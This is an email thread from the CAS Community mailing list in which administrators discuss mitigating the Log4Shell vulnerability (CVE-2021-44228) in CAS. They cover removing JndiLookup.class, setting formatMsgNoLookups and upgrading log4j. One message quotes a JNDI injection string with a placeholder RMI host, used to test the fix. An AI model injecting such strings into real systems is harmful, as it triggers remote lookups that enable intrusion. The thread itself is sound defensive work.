I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped
outgoing connections when a line like
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than
www.example.com).
We were able to verify this fix with tcpdump on the CAS node as well as
border-firewall logging.
On Friday, December 10, 2021 at 1:59:00 PM UTC-5 richard.frovarp wrote:
> Maybe? The one that I've seen
> https://logging.apache.org/log4j/2.x/security.html
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to
> your JVM and not in the config file.
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
> the log4j2.xml config file might do to trick.
>
> I'm guessing we'd do that somewhere here at the top?
>
> <?xml version="1.0" encoding="UTF-8" ?>
> <!-- Specify the refresh internal in seconds. -->
> <Configuration monitorInterval="5" packages="org.apereo.cas.logging">
> <Properties>
> <Property name="baseDir">/etc/cas/logs</Property>
> </Properties>
> <Appenders>
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> [email protected]> wrote:
>
>> Using a new enough version of the JDK might also alleviate it? The other
>> option is to throw the config option at the JDK to stop it from happening.
>> That would seem to be easiest.
>>
>> On 12/10/21 12:36 PM, King, Robert wrote:
>>
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>>
>>
>>
>> Has anyone attempted to mitigate this CVE yet?
>>
>>
>>
>> There seems to be two possible approaches to mitigation:
>>
>>
>>
>> 1 The sledgehammer approach of removing the JndiLookup.class from the jar
>> files:
>>
>>
>>
>> zip –q –d log4j-core-*.jar
>> org/apache/logging/log4j/core/lookup/JndiLookup.class
>>
>>
>>
>> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>> --
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> ---
>> You received this message because you are subscribed to the Google Groups
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to [email protected].
>> To view this discussion on the web visit
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
>>
>> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca?utm_medium=email&utm_source=footer>
>> .
>>
>>
>> --
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> ---
>> You received this message because you are subscribed to the Google Groups
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to [email protected].
>> To view this discussion on the web visit
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
>>
>> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu?utm_medium=email&utm_source=footer>
>> .
>>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to [email protected].
>
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com
>
> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com?utm_medium=email&utm_source=footer>
> .
>
>
>
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
To view this discussion on the web visit
https://groups.google.com/a/apereo.org/d/msgid/cas-user/37170aad-78c6-4d0d-97d3-834030f0f6bcn%40apereo.org.
